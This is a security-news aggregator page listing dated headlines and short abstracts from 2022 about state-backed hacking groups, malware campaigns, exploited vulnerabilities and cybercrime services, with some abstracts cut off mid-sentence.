This edition of the Threatpost podcast is sponsored by Egress.Threatpost
August 11, 2022
The Hacking of Starlink Terminals Has Begun Full Text
Abstract
To access the satellite dish’s software, security researcher Lennert Wouters physically stripped down a dish he purchased and created a custom hacking tool that can be attached to the Starlink dish.Wired
August 10, 2022
The Business of Hackers-for-Hire Threat Actors Full Text
Abstract
Today's web has made hackers' tasks remarkably easy. For the most part, hackers don't even have to hide in the dark recesses of the web to take advantage of people any longer; they can be found right in plain sight on social media sites or forums, professionally advertised with their websites, and may even approach you anonymously through such channels as Twitter. Cybercrime has entered a new era where people don't steal just for the thrill of doing it anymore. They make it their business to carry out illegal cyber activities in small groups or individually to earn business from online criminals, selling offensive services like spyware as a service or commercial cybersecurity. For instance, a series of new DDoS for Hire are commoditizing the art of hacking and reducing the barrier to launching DDoS attacks . Who are Hackers-for-Hire? Hackers-for-hire are secret cyber experts or groups who specialize in infiltrating organizations to acquire intelligence in one wayThe Hacker News
August 10, 2022
Hackers behind Twilio data breach also targeted Cloudflare employees Full Text
Abstract
Cloudflare revealed that at least 76 employees and their family members were targeted by smishing attacks similar to the one that hit Twilio. The content delivery network and DDoS mitigation company Cloudflare revealed this week that at least 76 employees...Security Affairs
August 09, 2022
Chinese Hackers Targeted Dozens of Industrial Enterprises and Public Institutions Full Text
Abstract
Over a dozen military-industrial complex enterprises and public institutions in Afghanistan and Europe have come under a wave of targeted attacks since January 2022 to steal confidential data by simultaneously making use of six different backdoors. Russian cybersecurity firm Kaspersky attributed the attacks "with a high degree of confidence" to a China-linked threat actor tracked by Proofpoint as TA428 , citing overlaps in tactics, techniques, and procedures (TTPs). TA428, also tracked under the names Bronze Dudley, Temp.Hex, and Vicious Panda, has a history of striking entities in Ukraine, Russia, Belarus, and Mongolia. It's believed to share connections with another hacking group called Mustang Panda (aka Bronze President). Targets of the latest cyber espionage campaign included industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries and Afghanistan. Attack chains entailThe Hacker News
August 08, 2022
Chinese hackers use new Windows malware to backdoor govt, defense orgs Full Text
Abstract
An extensive series of attacks detected in January used new Windows malware to backdoor government entities and organizations in the defense industry from several countries in Eastern Europe.BleepingComputer
August 8, 2022
Hackers target social media accounts of small businesses via Instagram scams Full Text
Abstract
The phishing emails are often sent during the early evening and on weekends when the recipients are likely to be less vigilant. Such emails often claim that a business page had violated copyright laws.The Age
August 5, 2022
Mysterious threat actor TAC-040 used previously undetected Ljl Backdoor Full Text
Abstract
A threat actor, tracked as TAC-040, exploited Atlassian Confluence flaw CVE-2022-26134 to deploy previously undetected Ljl Backdoor. Cybersecurity firm Deepwatch reported that a threat actor, tracked as TAC-040, has likely exploited the CVE-2022-26134...Security Affairs
August 04, 2022
Thousands of hackers flock to ‘Dark Utilities’ C2-as-a-Service Full Text
Abstract
Security researchers found a new service called Dark Utilities that provides an easy and inexpensive way for cybercriminals to set up a command and control (C2) center for their malicious operations.BleepingComputer
August 02, 2022
Chinese hackers use new Cobalt Strike-like attack framework Full Text
Abstract
Researchers have observed a new post-exploitation attack framework used in the wild, named Manjusaka, which can be deployed as an alternative to the widely abused Cobalt Strike toolset or parallel to it for redundancy.BleepingComputer
August 02, 2022
Chinese Hackers Using New Manjusaka Hacking Framework Similar to Cobalt Strike Full Text
Abstract
Researchers have disclosed a new offensive framework called Manjusaka that they call a "Chinese sibling of Sliver and Cobalt Strike." "A fully functional version of the command-and-control (C2), written in GoLang with a User Interface in Simplified Chinese, is freely available and can generate new implants with custom configurations with ease, increasing the likelihood of wider adoption of this framework by malicious actors," Cisco Talos said in a new report. Sliver and Cobalt Strike are legitimate adversary emulation frameworks that have been used by threat actors to carry out post-exploitation activities such as network reconnaissance, lateral movement, and facilitating the deployment of follow-on payloads. Written in Rust, Manjusaka -- meaning "cow flower" -- is advertised as an equivalent to the Cobalt Strike framework with capabilities to target both Windows and Linux operating systems. Its developer is believed to be located in the GuangDongThe Hacker News
July 30, 2022
Microsoft Links Raspberry Robin USB Worm to Russian Evil Corp Hackers Full Text
Abstract
Microsoft on Friday disclosed a potential connection between the Raspberry Robin USB-based worm and an infamous Russian cybercrime group tracked as Evil Corp. The tech giant said it observed the FakeUpdates (aka SocGholish) malware being delivered via existing Raspberry Robin infections on July 26, 2022. Raspberry Robin, also called QNAP Worm, is known to spread from a compromised system via infected USB devices containing malicious a .LNK files to other devices in the target network. The campaign, which was first spotted by Red Canary in September 2021, has been elusive in that no later-stage activity has been documented nor has there any concrete link tying it to a known threat actor or group. The disclosure, therefore, marks the first evidence of post-exploitation actions carried out by the threat actor upon leveraging the malware to gain initial access to a Windows machine. "The DEV-0206-associated FakeUpdates activity on affected systems has since led to follow-oThe Hacker News
July 29, 2022
North Korean Hackers Using Malicious Browser Extension to Spy on Email Accounts Full Text
Abstract
A threat actor operating with interests aligned with North Korea has been deploying a malicious extension on Chromium-based web browsers that's capable of stealing email content from Gmail and AOL. Cybersecurity firm Volexity attributed the malware to an activity cluster it calls SharpTongue , which is said to share overlaps with an adversarial collective publicly referred to under the name Kimsuky . SharpTongue has a history of singling out individuals working for organizations in the U.S., Europe, and South Korea who "work on topics involving North Korea, nuclear issues, weapons systems, and other matters of strategic interest to North Korea," researchers Paul Rascagneres and Thomas Lancaster said . Kimsuky 's use of rogue extensions in attacks is not new. In 2018, the actor was seen utilizing a Chrome plugin as part of a campaign called Stolen Pencil to infect victims and steal browser cookies and passwords. But the latest espionage effort is differentThe Hacker News
July 28, 2022
Hackers Opting New Attack Methods After Microsoft Blocked Macros by Default Full Text
Abstract
With Microsoft taking steps to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default across Office apps, malicious actors are responding by refining their new tactics, techniques, and procedures (TTPs). "The use of VBA and XL4 Macros decreased approximately 66% from October 2021 through June 2022," Proofpoint said in a report shared with The Hacker News. In its place, adversaries are increasingly pivoting away from macro-enabled documents to other alternatives, including container files such as ISO and RAR as well as Windows Shortcut (LNK) files in campaigns to distribute malware. "Threat actors pivoting away from directly distributing macro-based attachments in email represents a significant shift in the threat landscape," Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, said in a statement. "Threat actors are now adopting new tactics to deliver malware, and the increased use of files sucThe Hacker News
July 28, 2022
Threat actors use new attack techniques after Microsoft blocked macros by default Full Text
Abstract
Threat actors are devising new attack tactics in response to Microsoft's decision to block Macros by default. In response to Microsoft's decision steps to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default in Microsoft...Security Affairs
July 27, 2022
DUCKTAIL operation targets Facebook’s Business and Ad accounts Full Text
Abstract
Researchers uncovered an ongoing operation, codenamed DUCKTAIL that targets Facebook Business and Ad Accounts. Researchers from WithSecure (formerly F-Secure Business) have discovered an ongoing operation, named DUCKTAIL, that targets individuals...Security Affairs
July 26, 2022
AIG Threat Group Emerges With Unique Business Model Full Text
Abstract
A threat group calling itself the Atlas Intelligence Group, or AIG, was spotted offering cybercriminals a broad range of services such as leaked databases and DDoS services, hacking scripts, and more. AIG’s approach and operational efficiency make them hard to detect and a constant source of threat ... Read MoreCyware Alerts - Hacker News
July 25, 2022
Hackers Deceive Developers by Spoofing GitHub Commit Metadata Full Text
Abstract
Checkmarx warned against a new supply-chain attack that involves spoofing metadata commits to deceive GitHub developers into using malicious code. Commits are essential components in the GitHub system and have a unique hash or ID. Fake commits can be automatically generated and added to the use ... Read MoreCyware Alerts - Hacker News
July 19, 2022
Russian Hackers Tricked Ukrainians with Fake “DoS Android Apps to Target Russia” Full Text
Abstract
Russian threat actors capitalized on the ongoing conflict against Ukraine to distribute Android malware camouflaged as an app for pro-Ukrainian hacktivists to launch distributed denial-of-service (DDoS) attacks against Russian sites. Google Threat Analysis Group (TAG) attributed the malware to Turla, an advanced persistent threat also known as Krypton, Venomous Bear, Waterbug, and Uroburos, and linked to Russia's Federal Security Service (FSB). "This is the first known instance of Turla distributing Android-related malware," TAG researcher Billy Leonard said . "The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services." It's worth noting that the onslaught of cyberattacks in the immediate aftermath of Russia's unprovoked invasion of Ukraine prompted the latter to form an IT Army to stage counter-DDoS attacks against Russian websiteThe Hacker News
July 19, 2022
Russian Hackers Using DropBox and Google Drive to Drop Malicious Payloads Full Text
Abstract
The Russian state-sponsored hacking collective known as APT29 has been attributed to a new phishing campaign that takes advantage of legitimate cloud services like Google Drive and Dropbox to deliver malicious payloads on compromised systems. "These campaigns are believed to have targeted several Western diplomatic missions between May and June 2022," Palo Alto Networks Unit 42 said in a Tuesday report. "The lures included in these campaigns suggest targeting of a foreign embassy in Portugal as well as a foreign embassy in Brazil." APT29, also tracked under the monikers Cozy Bear, Cloaked Ursa, or The Dukes, has been characterized as an organized cyberespionage group working to collect intelligence that aligns with Russia's strategic objectives. Some aspects of the advanced persistent threat's activities, including the infamous SolarWinds supply chain attack of 2020, are separately tracked by Microsoft under the name Nobelium, with Mandiant calling iThe Hacker News
July 19, 2022
Researchers Reveal a New Technique to Unmask Anonymous Users Full Text
Abstract
Researchers from the New Jersey Institute of Technology warned against a unique tactic that can be used by threat actors to de-anonymize website visitors and link them to potential personal data. The hack analyzes low-key features of a target’s browser activity to find out whether they are logged i ... Read MoreCyware Alerts - Hacker News
July 19, 2022
Hacker Targeting Industrial Control Systems Full Text
Abstract
Several accounts on social media websites were found promoting PLC and HMI systems through fake file password cracking software to deploy the Sality malware. Sality is an old malware that requires a distributed computing architecture to complete tasks, such as cryptomining and password cracking, fa ... Read MoreCyware Alerts - Hacker News
July 19, 2022
Russian hackers use fake DDoS app to infect pro-Ukrainian activists Full Text
Abstract
Google's Threat Analysis Group (TAG), whose primary goal is to defend Google users from state-sponsored attacks, said today that Russian-backed threat groups are still focusing their attacks on Ukrainian organizations.BleepingComputer
July 19, 2022
Russian SVR hackers use Google Drive, Dropbox to evade detection Full Text
Abstract
State-backed hackers part of Russia's Federation Foreign Intelligence Service (SVR) have switched, for the first time, to using legitimate cloud storage services such as Google Drive to evade detection.BleepingComputer
July 18, 2022
Hackers Distributing Password Cracking Tool for PLCs and HMIs to Target Industrial Systems Full Text
Abstract
Industrial engineers and operators are the target of a new campaign that leverages password cracking software to seize control of Programmable Logic Controllers (PLCs) and co-opt the machines to a botnet. The software "exploited a vulnerability in the firmware which allowed it to retrieve the password on command," Dragos security researcher Sam Hanson said . "Further, the software was a malware dropper, infecting the machine with the Sality malware and turning the host into a peer in Sality's peer-to-peer botnet." The industrial cybersecurity firm said the password retrieval exploit embedded in the malware dropper is designed to recover the credential associated with Automation Direct DirectLOGIC 06 PLC . The exploit, tracked as CVE-2022-2003 (CVSS score: 7.7), has been described as a case of cleartext transmission of sensitive data that could lead to information disclosure and unauthorized changes. The issue was addressed in firmware Version 2.72 releThe Hacker News
July 14, 2022
Microsoft links Holy Ghost ransomware operation to North Korean hackers Full Text
Abstract
For more than a year, North Korean hackers have been running a ransomware operation called HolyGhost, attacking small businesses in various countries.BleepingComputer
July 14, 2022
The Lawfare Podcast: How Mercenary Hackers Sway Litigation Battles Full Text
Abstract
Alvaro Marañon sat down with Chris Bing and Raphael Satter to discuss the use of foreign hackers to win lawsuits and arbitration battles.Lawfare
July 14, 2022
Pro-Russia Hacker Group Killnet Targets Latvia Full Text
Abstract
Russia-based Killnet group has been bombarding Latvia with a series of cyberattacks, including a 12-hour attack on one of its broadcasting centers. Hackers made a demand that Lithuania must allow transit of goods to Kaliningrad if they wanted to avoid more attacks on their government institutions a ... Read MoreCyware Alerts - Hacker News
July 12, 2022
New ‘Luna Moth’ hackers breach orgs via fake subscription renewals Full Text
Abstract
A new data extortion group has been breaching companies to steal confidential information, threatening victims to make the files publicly available unless they pay a ransom.BleepingComputer
July 10, 2022
Attackers Picking Up Brute Ratel as an Alternative to Cobalt Strike Full Text
Abstract
Nation-state threat actors are leveraging Brute Ratel, a red-teaming attack simulation tool, to evade detection by EDR and antivirus, in place of Cobalt Strike. It costs around $2,500 per user for a one-year license, with customers having to provide a business email address that should be verified ... Read MoreCyware Alerts - Hacker News
July 10, 2022
Experts demonstrate how to unlock several Honda models via Rolling-PWN attack Full Text
Abstract
Bad news for the owners of several Honda models, the Rolling-PWN Attack vulnerability can allow unlocking their vehicles. A team of security Researchers Kevin2600 and Wesley Li from Star-V Lab independently discovered a flaw in Honda models, named...Security Affairs
July 4, 2022
Hacker Claims to Have Stolen 1 Billion Records of Chinese Citizens Full Text
Abstract
A hacker has claimed to have procured a trove of personal information from the Shanghai police on one billion Chinese citizens, which tech experts say, if true, would be one of the biggest data breaches in history.Reuters
July 4, 2022
Teen “Hackers” on Discord Selling Malware for Quick Cash Full Text
Abstract
Avast security researchers have discovered a server on Discord where a group of minors is involved in developing, upgrading, marketing, and selling malware and ransomware strains on the platform, supposedly to earn pocket money.Hackread
June 30, 2022
Update: North Korea-backed Hacking Collective Lazarus Group Suspected to be Behind Recent Harmony Bridge Attack Full Text
Abstract
On June 27, the culprit is said to have begun moving funds amounting to $39 million through the Tornado Cash mixer service in an attempt to obscure the ill-gotten gains and make it difficult to trace the transaction trail back to the original theft.IT Security Guru
June 30, 2022
North Korean Hackers Suspected to be Behind $100M Horizon Bridge Hack Full Text
Abstract
The notorious North Korea-backed hacking collective Lazarus Group is suspected to be behind the recent $100 million altcoin theft from Harmony Horizon Bridge, citing similarities to the Ronin bridge attack in March 2022. The finding comes as Harmony confirmed that its Horizon Bridge, a platform that allows users to move cryptocurrency across different blockchains, had been breached last week. The incident involved the exploiter carrying out multiple transactions on June 23 that extracted tokens stored in the bridge and subsequently made away with about $100 million in cryptocurrency. "The stolen crypto assets included Ether (ETH), Tether (USDT), Wrapped Bitcoin (WBTC) and BNB," blockchain analytics company Elliptic said in a new report. "The thief immediately used Uniswap – a decentralized exchange (DEX) – to convert much of these assets into a total of 85,837 ETH." Days later, on June 27, the culprit is said to have begun moving funds amounting to $39The Hacker News
June 28, 2022
Evilnum hackers return in new operation targeting migration orgs Full Text
Abstract
The Evilnum hacking group is showing renewed signs of malicious activity, targeting European organizations that are involved in international migration.BleepingComputer
June 25, 2022
China-Based Tropic Trooper Adopts New Malware Variants and Custom Encryption to Target Victims Full Text
Abstract
The trojan is bundled in a greyware tool named SMS Bomber, which is used for DoS attacks against phones. Such types of tools are generally used by amateur threat actors who want to carry out attacks against sites.Cyware Alerts - Hacker News
June 23, 2022
Chinese Hackers Distributing SMS Bomber Tool with Malware Hidden Inside Full Text
Abstract
A threat cluster with ties to a hacking group called Tropic Trooper has been spotted using a previously undocumented malware coded in Nim language to strike targets as part of a newly discovered campaign. The novel loader, dubbed Nimbda, is "bundled with a Chinese language greyware 'SMS Bomber' tool that is most likely illegally distributed in the Chinese-speaking web," Israeli cybersecurity company Check Point said in a report. "Whoever crafted the Nim loader took special care to give it the same executable icon as the SMS Bomber that it drops and executes," the researchers said. "Therefore the entire bundle works as a trojanized binary." SMS Bomber, as the name indicates, allows a user to input a phone number (not their own) so as to flood the victim's device with messages and potentially render it unusable in what's a denial-of-service (DoS) attack. The fact that the binary doubles up as SMS Bomber and a backdoor suggests that tThe Hacker News
June 23, 2022
Bronze Starlight Hacker Group Spreads Ransomware Using HUI Loader Full Text
Abstract
According to Secureworks' Counter Threat Unit (CTU) research team, two activity clusters related to HUI Loader have been connected to Chinese-speaking threat actors, namely Bronze Riverside and Bronze Starlight.ZDNet
June 23, 2022
Chinese hackers use ransomware as decoy for cyber espionage Full Text
Abstract
Two Chinese hacking groups conducting cyber espionage and stealing intellectual property from Japanese and western companies are deploying ransomware as a decoy to cover up their malicious activities.BleepingComputer
June 21, 2022
New ToddyCat Hacker Group on Experts’ Radar After Targeting MS Exchange Servers Full Text
Abstract
An advanced persistent threat (APT) actor codenamed ToddyCat has been linked to a string of attacks aimed at high-profile entities in Europe and Asia since at least December 2020. The relatively new adversarial collective is said to have commenced its operations by targeting Microsoft Exchange servers in Taiwan and Vietnam using an unknown exploit to deploy the China Chopper web shell and activate a multi-stage infection chain. Other prominent countries targeted include Afghanistan, India, Indonesia, Iran, Kyrgyzstan, Malaysia, Pakistan, Russia, Slovakia, Thailand, the U.K., and Uzbekistan, just as the threat actor evolved its toolset over the course of different campaigns. "The first wave of attacks exclusively targeted Microsoft Exchange Servers, which were compromised with Samurai, a sophisticated passive backdoor that usually works on ports 80 and 443," Russian cybersecurity company Kaspersky said in a report published today. "The malware allows arbitrary C#The Hacker News
June 17, 2022
Experts link Hermit spyware to Italian surveillance firm RCS Lab and a front company Full Text
Abstract
Experts uncovered an enterprise-grade surveillance malware dubbed Hermit used to target individuals in Kazakhstan, Syria, and Italy since 2019. Lookout Threat Lab researchers uncovered enterprise-grade Android surveillance spyware, named Hermit,...Security Affairs
June 09, 2022
Chinese hacking group Aoqin Dragon quietly spied orgs for a decade Full Text
Abstract
A previously unknown Chinese-speaking threat actor has been uncovered by threat analysts SentinelLabs who were able to link it to malicious activity going as far back as 2013.BleepingComputer
June 02, 2022
Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability Full Text
Abstract
Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild. The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134 . "Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server," it said in an advisory. "There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix." Specifics of the security flaw have been withheld until a software patch is available. All supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version isThe Hacker News
May 31, 2022
Hackers steal WhatsApp accounts using call forwarding trick Full Text
Abstract
There's a trick that allows attackers to hijack a victim's WhatsApp account and gain access to personal messages and contact list.BleepingComputer
May 29, 2022
Pro-Russian hacker group KillNet plans to attack Italy on May 30 Full Text
Abstract
Pro-Russian hacker group KillNet is threatening again Italy, it announced a massive and unprecedented attack on May 30. Pro-Russian hacker group KillNet is threatening again Italy, it announced a massive and unprecedented attack on May 30. Pro-Russian...Security Affairs
May 26, 2022
Hackers Increasingly Using Browser Automation Frameworks for Malicious Activities Full Text
Abstract
Cybersecurity researchers are calling attention to a free-to-use browser automation framework that's being increasingly used by threat actors as part of their attack campaigns. "The framework contains numerous features which we assess may be utilized in the enablement of malicious activities," researchers from Team Cymru said in a new report published Wednesday. "The technical entry bar for the framework is purposefully kept low, which has served to create an active community of content developers and contributors, with actors in the underground economy advertising their time for the creation of bespoke tooling." The U.S. cybersecurity company said it observed command-and-control (C2) IP addresses associated with malware such as Bumblebee , BlackGuard , and RedLine Stealer establishing connections to the downloads subdomain of Bablosoft ("downloads.bablosoft[.]com"), the maker of the Browser Automation Studio (BAS). Bablosoft was previouslyThe Hacker News
May 25, 2022
Hacker says hijacking libraries, stealing AWS keys was ethical research Full Text
Abstract
The hacker of 'ctx' and 'PHPass' libraries has now broken silence and explained the reasons behind this hijack to BleepingComputer. According to the hacker, this was a bug bounty exercise and no malicious activity was intended.BleepingComputer
May 23, 2022
Threat actors target the infoSec community with fake PoC exploits Full Text
Abstract
Researchers uncovered a malware campaign targeting the infoSec community with fake Proof Of Concept to deliver a Cobalt Strike beacon. Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infoSec community. The expert...Security Affairs
May 19, 2022
Lazarus hackers target VMware servers with Log4Shell exploits Full Text
Abstract
The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.BleepingComputer
May 17, 2022
North Korean devs pose as US freelancers to aid DRPK govt hackers Full Text
Abstract
The U.S. government is warning that the Democratic People's Republic of Korea (DPRK) is dispatching its IT workers to get freelance jobs at companies across the world to obtain privileged access that is sometimes used to facilitate cyber intrusions.BleepingComputer
May 11, 2022
Hackers are using tech services companies as a ‘launchpad’ for attacks on customers Full Text
Abstract
A warning from international cybersecurity agencies has urged IT service providers and their customers to take action to protect themselves from the threat of supply chain attacks.ZDNet
May 09, 2022
Hackers display “blood is on your hands” on Russian TV, take down RuTube Full Text
Abstract
Hackers continue to target Russia with cyberattacks, defacing Russian TV to show pro-Ukrainian messages and taking down the RuTube video streaming site.BleepingComputer
May 09, 2022
Hackers exploiting critical F5 BIG-IP bug, public exploits released Full Text
Abstract
Threat actors have started massively exploiting the critical vulnerability tracked as CVE-2022-1388, which affects multiple versions of all F5 BIG-IP modules, to drop malicious payloads.BleepingComputer
May 06, 2022
Hackers Using PrivateLoader PPI Service to Distribute New NetDooka Malware Full Text
Abstract
A pay-per-install (PPI) malware service known as PrivateLoader has been spotted distributing a "fairly sophisticated" framework called NetDooka, granting attackers complete control over the infected devices. "The framework is distributed via a pay-per-install (PPI) service and contains multiple parts, including a loader, a dropper, a protection driver, and a full-featured remote access trojan (RAT) that implements its own network communication protocol," Trend Micro said in a report published Thursday. PrivateLoader, as documented by Intel 471 in February 2022, functions as a downloader responsible for downloading and installing additional malware onto the infected system, including SmokeLoader, RedLine Stealer, Vidar, Raccoon, GCleaner, and Anubis . Featuring anti-analysis techniques, PrivateLoader is written in the C++ programming language and is said to be in active development, with the downloader malware family gaining traction among multiple threat acThe Hacker News
May 4, 2022
Chinese Naikon Group Back with New Espionage Attack Full Text
Abstract
The spear-phishing email consists of a weaponized document pretending to be a call for tender. Two payloads are hidden in the document as document properties.Cyware Alerts - Hacker News
May 04, 2022
Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies Full Text
Abstract
An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed " Operation CuckooBees " by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America. "The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said . "In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data." Winnti, also tracked by otherThe Hacker News
May 04, 2022
Ukraine War Themed Files Become the Lure of Choice for a Wide Range of Hackers Full Text
Abstract
A growing number of threat actors are using the ongoing Russo-Ukrainian war as a lure in various phishing and malware campaigns, even as critical infrastructure entities continue to be heavily targeted. "Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links," Google Threat Analysis Group's (TAG) Billy Leonard said in a report. "Financially motivated and criminal actors are also using current events as a means for targeting users," Leonard added. One notable threat actor is Curious Gorge, which TAG has attributed to China People's Liberation Army Strategic Support Force (PLA SSF) and has been observed striking government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. Attacks aimed at Russia have singled out several governmental entitiThe Hacker News
May 3, 2022
Lapsus$ Eyes SharePoint, VPNs, and VMs Full Text
Abstract
A new report revealed the techniques and tactics of the highly unpredictable attacks by the Lapsus$ gang to target the victims, along with its interest in exploiting SharePoint, VPNs, and VMs. Researchers have observed mass deletion of VMs, storage, and configurations in cloud environments. For rem ... Read MoreCyware Alerts - Hacker News
May 3, 2022
TA410 Group has Got New Tools and Three Teams Working Under it Full Text
Abstract
Analysts revealed that threat group TA410 comprised three independent subgroups, that have been operating globally since 2018, to collect intelligence data via phishing campaigns. TA410 shares behavioral, tooling overlaps with APT10 and has a history of targeting U.S.-based organizations. Organizat ... Read MoreCyware Alerts - Hacker News
May 02, 2022
New Hacker Group Pursuing Corporate Employees Focused on Mergers and Acquisitions Full Text
Abstract
A newly discovered suspected espionage threat actor has been targeting employees focusing on mergers and acquisitions as well as large corporate transactions to facilitate bulk email collection from victim environments. Mandiant is tracking the activity cluster under the uncategorized moniker UNC3524, citing a lack of evidence linking it to an existing group. However, some of the intrusions are said to mirror techniques used by different Russia-based hacking crews like APT28 and APT29 . "The high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet set this group apart and emphasize the 'advanced' in Advanced Persistent Threat," the threat intelligence firm said in a Monday report. The initial access route is unknown but upon gaining a foothold, attack chains involving UNC3524 culminate in the deployment of a novel backdoor called QUIETEXIT for persistent remote access for as long asThe Hacker News
May 02, 2022
Chinese “Override Panda” Hackers Resurface With New Espionage Attacks Full Text
Abstract
A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country." Override Panda, also called Naikon , Hellsing, and Bronze Geneva, is known to operate on behalf of Chinese interests since at least 2005 to conduct intelligence-gathering operations targeting ASEAN countries . Attack chains unleashed by the threat actor have involved the use of decoy documents attached to spear-phishing emails that are designed to entice the intended victims to open and compromise themselves with malwareThe Hacker News
May 02, 2022
Cyberspies use IP cameras to deploy backdoors, steal Exchange emails Full Text
Abstract
A newly discovered and uncommonly stealthy Advanced Persistent Threat (APT) group is breaching corporate networks to steal Exchange (on-premise and online) emails from employees involved in corporate transactions such as mergers and acquisitions.BleepingComputer
May 01, 2022
Russian hackers compromise embassy emails to target governments Full Text
Abstract
Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities.BleepingComputer
April 28, 2022
Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group Full Text
Abstract
A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities. Calling TA410 an umbrella group comprised of three teams dubbed FlowingFrog, LookingFrog and JollyFrog, Slovak cybersecurity firm ESET assessed that "these subgroups operate somewhat independently, but that they may share intelligence requirements, an access team that runs their spear-phishing campaigns, and also the team that deploys network infrastructure." TA410 — said to share behavioral and tooling overlaps with APT10 (aka Stone Panda or TA429) — has a history of targeting U.S-based organizations in the utilities sector as well as diplomatic entities in the Middle East and Africa. Other identified victims of the hacker collective include a manufacturing company in Japan, a mining business in India, and a charity in IsraThe Hacker News
April 27, 2022
U.S. Offers $10 Million Bounty for Information on 6 Russian Military Hackers Full Text
Abstract
The U.S. government on Tuesday announced up to $10 million in rewards for information on six hackers associated with the Russian military intelligence service. "These individuals participated in malicious cyber activities on behalf of the Russian government against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act," the State Department's Rewards for Justice Program said . All the six Russian officers are members of an advanced persistent threat group called Sandworm (aka Voodoo Bear or Iron Viking), which is known to be operating since at least 2008 with a specific focus on targeting entities in Ukraine with the goal of establishing an illicit, long-term presence in order to mine highly sensitive data. The hackers, who are officers of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation ( GRU ), are as follows - Artem Valeryevich Ochichenko , who has been linked to technical reconnaissaThe Hacker News
April 27, 2022
Chinese state-backed hackers now target Russian state officers Full Text
Abstract
Security researchers analyzing a phishing campaign targeting Russian officials found evidence that points to the China-based threat actor tracked as Mustang Panda (also known as HoneyMyte and Bronze President).BleepingComputer
April 26, 2022
TeamTNT has Updated its Attack Tactics Full Text
Abstract
TeamTNT hackers’ shell scripts were found disabling cloud security tools to attack AWS and Alibaba Cloud. Its payloads include credential stealers, cryptocurrency miners, persistence, and lateral movement. Organizations are suggested to continue taking the right measures to protect your systems fro ... Read MoreCyware Alerts - Hacker News
April 26, 2022
Gold Ulrick Hackers Still in Action Despite Massive Conti Ransomware Leak Full Text
Abstract
The infamous ransomware group known as Conti has continued its onslaught against entities despite suffering a massive data leak of its own earlier this year, according to new research. Conti, attributed to a Russia-based threat actor known as Gold Ulrick , is one of the most prevalent malware strains in the ransomware landscape, accounting for 19% of all attacks during the three-month-period between October and December 2021. One of the most prolific ransomware groups of the last year along the likes of LockBit 2.0, PYSA, and Hive, Conti has locked the networks of hospitals, businesses, and government agencies, while receiving a ransom payment in exchange for sharing the decryption key as part of its name-and-shame scheme. But after the cybercriminal cartel came out in support of Russia over its invasion of Ukraine in February, an anonymous Ukrainian security researcher under the Twitter handle ContiLeaks began leaking the source code as well as private conversations betweenThe Hacker News
April 25, 2022
North Korean hackers targeting journalists with novel malware Full Text
Abstract
North Korean state-sponsored hackers known as APT37 have been discovered targeting journalists specializing in the DPRK with a novel malware strain.BleepingComputer
April 22, 2022
Russian hackers are seeking alternative money-laundering options Full Text
Abstract
The Russian cybercrime community, one of the most active and prolific in the world, is turning to alternative money-laundering methods due to sanctions on Russia and law enforcement actions against dark web markets.BleepingComputer
April 22, 2022
Chinese hackers behind most zero-day exploits during 2021 Full Text
Abstract
Threat analysts report that zero-day vulnerability exploitation is on the rise with Chinese hackers using most of them in attacks last year.BleepingComputer
April 22, 2022
TeamTNT Targets Linux Instances on AWS, Alibaba Cloud for Credential Theft and Cryptomining Full Text
Abstract
TeamTNT is actively modifying its scripts after they were made public by security researchers. These scripts primarily target Amazon Web Services, but can also run in on-premise, container, or other forms of Linux instances.Cisco Talos
April 21, 2022
Hackers earn $400K for zero-day ICS exploits demoed at Pwn2Own Full Text
Abstract
Pwn2Own Miami 2022 has ended with competitors earning $400,000 for 26 zero-day exploits (and several bug collisions) targeting ICS and SCADA products demoed during the contest between April 19 and April 21.BleepingComputer
April 18, 2022
Cyberattackers Put the Pedal to the Medal: Podcast Full Text
Abstract
Fortinet’s Derek Manky discusses the exponential increase in the speed that attackers weaponize fresh vulnerabilities, where botnets and offensive automation fit in, and the ramifications for security teams.Threatpost
April 10, 2022
Facebook blocked Russia and Belarus threat actors’ activity against Ukraine Full Text
Abstract
